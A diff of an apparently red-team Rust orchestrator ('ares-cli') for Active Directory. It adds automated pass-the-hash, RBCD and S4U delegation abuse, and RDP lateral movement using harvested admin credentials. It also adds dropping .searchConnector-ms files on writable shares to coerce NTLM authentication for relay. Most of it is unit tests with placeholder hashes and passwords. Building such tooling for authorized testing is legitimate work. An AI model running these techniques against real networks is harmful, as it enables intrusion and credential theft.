false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hash_domain_preferred_over_hostname_domain() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + // Hash domain takes priority over hostname domain + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_ntlm_hash_type_case_insensitive() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-1".into(), + username: "admin".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee".into(), // pragma: allowlist secret + hash_type: "Ntlm".into(), // mixed case + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation/rbcd.rs b/ares-cli/src/orchestrator/automation/rbcd.rs index b28228c6..5f487a75 100644 --- a/ares-cli/src/orchestrator/automation/rbcd.rs +++ b/ares-cli/src/orchestrator/automation/rbcd.rs @@ -14,6 +14,7 @@ use serde_json::json; use tokio::sync::watch; use tracing::{debug, info, warn}; +use crate::dedup::is_ghost_machine_account; use crate::orchestrator::dispatcher::Dispatcher; /// Dedup key prefix for RBCD attacks. @@ -91,6 +92,14 @@ pub async fn auto_rbcd_exploitation( .or_else(|| vuln.details.get("victim")) .and_then(|v| v.as_str()) .map(|s| s.to_string())?; + if is_ghost_machine_account(&target_computer) { + debug!( + vuln_id = %vuln.vuln_id, + target = %target_computer, + "RBCD skipped: ghost machine account target" + ); + return None; + } let domain = vuln .details @@ -99,28 +108,14 @@ pub async fn auto_rbcd_exploitation( .unwrap_or("") .to_string(); - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - + // Find credential for the source user. Cross-forest ACL + // edges (e.g. leo@contoso → sql01$@fabrikam) put the + // source user in a different domain than the vuln's `domain` + // field (which is the target's domain), so we cannot + // domain-restrict against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; @@ -296,6 +291,11 @@ mod tests { assert!(!is_rbcd_candidate("shadow_credentials", Some("Computer"))); } + #[test] + fn ghost_machine_target_detected() { + assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$")); + } + #[test] fn resolve_computer_ip_exact_match() { let hosts = vec![ diff --git a/ares-cli/src/orchestrator/automation/rdp_lateral.rs b/ares-cli/src/orchestrator/automation/rdp_lateral.rs new file mode 100644 index 00000000..5c984dce --- /dev/null +++ b/ares-cli/src/orchestrator/automation/rdp_lateral.rs @@ -0,0 +1,716 @@ +//! auto_rdp_lateral -- RDP lateral movement to hosts with port 3389. +//! +//! Targets hosts with RDP service (port 3389) that are not yet owned. +//! Uses xfreerdp or similar tooling to authenticate and execute commands +//! via RDP, complementing WinRM lateral movement for hosts that only +//! expose RDP. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// RDP lateral movement to hosts with port 3389. +/// Interval: 45s. +pub async fn auto_rdp_lateral(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("rdp_lateral") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_rdp_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "rdp_lateral", + "target_ip": item.host_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("rdp_lateral"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host_ip, + hostname = %item.hostname, + "RDP lateral movement dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_RDP_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_RDP_LATERAL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.host_ip, "RDP lateral deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.host_ip, "Failed to dispatch RDP lateral"); + } + } + } + } +} + +/// Collect RDP lateral movement work items from current state. +/// +/// Extracted from the async loop for testability. +fn collect_rdp_work(state: &crate::orchestrator::state::StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Skip already-owned hosts + if host.owned { + continue; + } + + // Check for RDP service (port 3389) + let has_rdp = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + if !has_rdp { + continue; + } + + let dedup_key = format!("rdp:{}", host.ip); + if state.is_processed(DEDUP_RDP_LATERAL, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + // Find admin credential for this domain + let cred = state + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + // Fall back to any credential with a password + state.credentials.iter().find(|c| { + !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(RdpWork { + dedup_key, + host_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +struct RdpWork { + dedup_key: String, + host_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str, is_admin: bool) -> Credential { + Credential { + id: format!("c-{}", username), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, services: Vec, owned: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services, + is_dc: false, + owned, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_no_work() { + let shared = SharedState::new("test-op".into()); + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_returns_no_work() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_host_with_rdp_and_admin_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.10"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert!(work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_host_without_rdp_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["445/tcp microsoft-ds".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_owned_host_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + true, // already owned + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret + s.mark_processed(DEDUP_RDP_LATERAL, "rdp:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_falls_back_to_non_admin_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Only a non-admin credential available + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user1"); + assert!(!work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_prefers_admin_over_non_admin() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + s.credentials.push(make_credential( + "admin", + "Adm1nP@ss!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert!(work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_no_cred_for_domain_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Credential for wrong domain + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_bare_hostname_matches_any_domain_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + // Bare hostname (no domain suffix) → domain = "" → matches any cred + s.hosts.push(make_host( + "192.168.58.10", + "srv01", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_multiple_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.11", + "srv02.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.12", + "web01.contoso.local", + vec!["80/tcp http".into()], // no RDP + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.host_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.11")); + } + + #[tokio::test] + async fn collect_cred_with_empty_password_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "", "contoso.local", true)); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_rdp_detection_by_name() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["remote desktop rdp".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_dedup_key_format() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work[0].dedup_key, "rdp:192.168.58.10"); + } + + #[tokio::test] + async fn collect_cross_domain_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.20", + "srv01.fabrikam.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + s.credentials.push(make_credential( + "fadmin", + "F@bPass1!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + // contoso host uses contoso cred + let contoso_work = work.iter().find(|w| w.host_ip == "192.168.58.10").unwrap(); + assert_eq!(contoso_work.credential.domain, "contoso.local"); + // fabrikam host uses fabrikam cred + let fab_work = work.iter().find(|w| w.host_ip == "192.168.58.20").unwrap(); + assert_eq!(fab_work.credential.domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_rdp_work_via_shared_state() { + let shared = crate::orchestrator::state::SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + state.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.10"); + } + + #[test] + fn dedup_key_format() { + let key = format!("rdp:{}", "192.168.58.22"); + assert_eq!(key, "rdp:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_RDP_LATERAL, "rdp_lateral"); + } + + #[test] + fn rdp_service_detection() { + let services = [ + "3389/tcp ms-wbt-server".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn no_rdp_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn rdp_service_detection_by_name() { + let services = ["remote desktop rdp".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_service_detection_case_insensitive() { + let services = ["3389/TCP MS-WBT-SERVER".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_payload_structure() { + let payload = serde_json::json!({ + "technique": "rdp_lateral", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "rdp_lateral"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn rdp_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RdpWork { + dedup_key: "rdp:192.168.58.22".into(), + host_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert!(work.credential.is_admin); + } + + #[test] + fn admin_credential_preferred() { + // The module first looks for admin creds, then falls back to any with password + let is_admin = true; + let has_password = true; + let admin_match = is_admin && has_password; + assert!(admin_match); + } + + #[test] + fn empty_services_no_rdp() { + let services: Vec = vec![]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } +} diff --git a/ares-cli/src/orchestrator/automation/s4u.rs b/ares-cli/src/orchestrator/automation/s4u.rs index 008d5e17..4d34453c 100644 --- a/ares-cli/src/orchestrator/automation/s4u.rs +++ b/ares-cli/src/orchestrator/automation/s4u.rs @@ -99,15 +99,23 @@ pub async fn auto_s4u_exploitation( // Don't increment failure count beyond what dispatch already counted. // The cooldown timer is already set from dispatch time. } - } else { - // Success or non-revocation error — reset failure count so - // subsequent dispatches aren't permanently blocked by the - // S4U_MAX_FAILURES threshold. + } else if should_reset_failure_count(result) { + // Only reset the failure count on actual success. + // Generic failures (wrong SPN, delegation edge is + // stale, service rejects S4U, etc.) must keep their + // accumulated count so deterministic dead-ends + // eventually stop retrying. if let Some(vid) = task_vuln_map.remove(&tid) { if let Some(entry) = dispatch_tracker.get_mut(&vid) { entry.1 = 0; } } + } else { + // Non-lockout, non-success failure: preserve the + // existing failure count that was incremented on + // dispatch. Remove the task mapping so future result + // scans do not reprocess it. + task_vuln_map.remove(&tid); } } } @@ -362,6 +370,11 @@ fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool { result_matches_patterns(result, LOCKOUT_PATTERNS) } +/// Only a successful S4U task should clear the accumulated failure count. +fn should_reset_failure_count(result: &ares_core::models::TaskResult) -> bool { + result.success +} + #[cfg(test)] mod tests { use super::*; @@ -562,4 +575,28 @@ mod tests { ); assert!(!has_lockout_error(&tr)); } + + #[test] + fn successful_task_resets_failure_count() { + let tr = TaskResult { + task_id: "t-ok".to_string(), + success: true, + result: Some(json!({"summary": "ticket obtained"})), + error: None, + completed_at: Utc::now(), + }; + assert!(should_reset_failure_count(&tr)); + } + + #[test] + fn generic_failure_does_not_reset_failure_count() { + let tr = TaskResult { + task_id: "t-fail".to_string(), + success: false, + result: Some(json!({"summary": "S4U failed: KRB_AP_ERR_MODIFIED"})), + error: None, + completed_at: Utc::now(), + }; + assert!(!should_reset_failure_count(&tr)); + } } diff --git a/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs new file mode 100644 index 00000000..53c7ce0a --- /dev/null +++ b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs @@ -0,0 +1,502 @@ +//! auto_searchconnector_coercion -- drop .searchConnector-ms files on writable shares. +//! +//! .searchConnector-ms XML files trigger WebDAV connections when a user browses +//! the share in Explorer. Unlike .lnk/.scf/.url (handled by auto_share_coercion), +//! searchConnector files force HTTP-based NTLM auth which bypasses SMB signing +//! requirements, enabling relay to LDAP/ADCS even when SMB signing is enforced. +//! +//! This module targets writable shares that auto_share_coercion has already +//! identified, deploying a complementary coercion technique. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SearchConnector coercion work items from current state. +/// +/// Pure logic extracted from `auto_searchconnector_coercion` so it can be +/// unit-tested without needing a `Dispatcher` or async runtime. +fn collect_searchconnector_work(state: &StateInner, listener: &str) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for share in &state.shares { + if !share.permissions.to_uppercase().contains("WRITE") { + continue; + } + + let dedup_key = format!("searchconn:{}:{}", share.host, share.name); + if state.is_processed(DEDUP_SEARCHCONNECTOR, &dedup_key) { + continue; + } + + // Find credential for the share's host + let host_info = state.hosts.iter().find(|h| h.ip == share.host); + let domain = host_info + .and_then(|h| { + h.hostname + .find('.') + .map(|i| h.hostname[i + 1..].to_lowercase()) + }) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(SearchConnectorWork { + dedup_key, + share_host: share.host.clone(), + share_name: share.name.clone(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Drops .searchConnector-ms coercion files on writable shares. +/// Interval: 45s. +pub async fn auto_searchconnector_coercion( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("searchconnector_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_searchconnector_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "searchconnector_coercion", + "target_ip": item.share_host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("searchconnector_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.share_host, + share = %item.share_name, + "searchConnector-ms coercion file dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SEARCHCONNECTOR, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SEARCHCONNECTOR, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.share_host, "searchConnector coercion deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.share_host, "Failed to dispatch searchConnector coercion"); + } + } + } + } +} + +struct SearchConnectorWork { + dedup_key: String, + share_host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + fn make_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("searchconn:{}:{}", "192.168.58.22", "Public"); + assert_eq!(key, "searchconn:192.168.58.22:Public"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SEARCHCONNECTOR, "searchconnector"); + } + + #[test] + fn writable_share_detection() { + let write_perms = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &write_perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable" + ); + } + } + + #[test] + fn readonly_share_rejected() { + let perm = "READ"; + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_host_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "searchconnector_coercion", + "target_ip": "192.168.58.22", + "share_name": "Public", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "searchconnector_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Public"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn writable_share_full_permission() { + let perm = "FULL"; + // FULL does not contain WRITE, so it should NOT be detected + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_fqdn_with_subdomain() { + let hostname = "web01.sub.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "sub.contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn dedup_key_special_characters_in_share_name() { + let key = format!("searchconn:{}:{}", "192.168.58.10", "Share With Spaces"); + assert_eq!(key, "searchconn:192.168.58.10:Share With Spaces"); + + let key2 = format!("searchconn:{}:{}", "192.168.58.10", "data$"); + assert_eq!(key2, "searchconn:192.168.58.10:data$"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "svc_admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = SearchConnectorWork { + dedup_key: "searchconn:192.168.58.22:Public".into(), + share_host: "192.168.58.22".into(), + share_name: "Public".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work.share_host, "192.168.58.22"); + assert_eq!(work.share_name, "Public"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "svc_admin"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn case_insensitive_permission_matching() { + let perms = ["write", "Write", "WRITE", "read/Write", "Read/WRITE"]; + for p in &perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable regardless of case" + ); + } + } + + // --- collect_searchconnector_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_shares_returns_no_work() { + let mut 